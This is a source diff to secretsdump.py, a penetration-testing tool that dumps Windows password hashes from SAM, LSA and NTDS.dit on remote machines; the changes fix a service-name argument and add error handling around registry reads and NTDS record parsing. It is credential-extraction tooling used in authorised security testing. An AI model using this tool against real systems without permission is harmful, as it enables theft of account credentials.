@@ -5,7 +5,7 @@
 # of the Apache Software License. See the accompanying LICENSE file
 # for more information.
 #
-# $Id: secretsdump.py 1107 2014-01-19 14:25:32Z bethus@gmail.com $
+# $Id: secretsdump.py 1154 2014-03-21 14:49:10Z bethus@gmail.com $
 #
 # Description: Performs various techniques to dump hashes from the
 #              remote machine without executing any agent there.
@@ -307,7 +307,7 @@ class RemoteOperations:
     def getServiceAccount(self, serviceName):
         try:
             # Open the service
-            ans = scmr.hROpenServiceW(self.__scmr, self.__scManagerHandle, self.__serviceName)
+            ans = scmr.hROpenServiceW(self.__scmr, self.__scManagerHandle, serviceName)
             serviceHandle = ans['lpServiceHandle']
             resp = scmr.hRQueryServiceConfigW(self.__scmr, serviceHandle)
             account = resp['lpServiceConfig']['lpServiceStartName'][:-1]
@@ -428,7 +428,11 @@ class RemoteOperations:
 
         ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Control\\Lsa')
         keyHandle = ans['phkResult']
-        dataType, noLMHash = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'NoLmHash')
+        try: 
+            dataType, noLMHash = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'NoLmHash')
+        except:
+            noLMHash = 0
+
         if noLMHash != 1:
             logging.debug('LMHashes are being stored')
             return False
@@ -1225,18 +1229,42 @@ class NTDSHashes():
                 self.__decryptHash(record)
             # Now let's keep moving through the NTDS file and decrypting what we find
             while True:
-                record = self.__ESEDB.getNextRow(self.__cursor)
+                try:
+                    record = self.__ESEDB.getNextRow(self.__cursor)
+                except: 
+                    logging.error('Error while calling getNextRow(), trying the next one')
+                    continue 
+
                 if record is None:
                     break
-                if record[self.NAME_TO_INTERNAL['sAMAccountType']] in self.ACCOUNT_TYPES: 
-                    self.__decryptHash(record)
+                try:
+                    if record[self.NAME_TO_INTERNAL['sAMAccountType']] in self.ACCOUNT_TYPES: 
+                        self.__decryptHash(record)
+                except Exception, e:
+                    #import traceback
+                    #print traceback.print_exc()
+                    try:
+                        logging.error("Error while processing row for user %s" % record[self.NAME_TO_INTERNAL['name']])
+                        logging.error(str(e))
+                    except: 
+                        logging.error("Error while processing row!")
+                        logging.error(str(e))
+                        pass
+         
 
     def export(self, fileName):
         if len(self.__itemsFound) > 0:
             items = sorted(self.__itemsFound)
             fd = open(fileName+'.ntds','w+')
             for item in items:
-                fd.write(self.__itemsFound[item]+'\n')
+                try:
+                    fd.write(self.__itemsFound[item]+'\n')
+                except Exception, e:
+                    try:
+                        logging.error("Error writing entry %d, skipping" % item)
+                    except:
+                        logging.error("Error writing entry, skipping")
+                    pass
             fd.close()
 
     def finish(self):
@@ -1306,7 +1334,12 @@ class DumpSecrets:
         currentControlSet = winreg.getValue('\\Select\\Current')[1]
         currentControlSet = "ControlSet%03d" % currentControlSet
 
-        noLmHash = winreg.getValue('\\%s\\Control\\Lsa\\NoLmHash' % currentControlSet)[1]
+        #noLmHash = winreg.getValue('\\%s\\Control\\Lsa\\NoLmHash' % currentControlSet)[1]
+        noLmHash = winreg.getValue('\\%s\\Control\\Lsa\\NoLmHash' % currentControlSet)
+        if noLmHash is not None:
+            noLmHash = noLmHash[1]
+        else:
+            noLmHash = 0
 
         if noLmHash != 1:
             logging.debug('LMHashes are being stored')
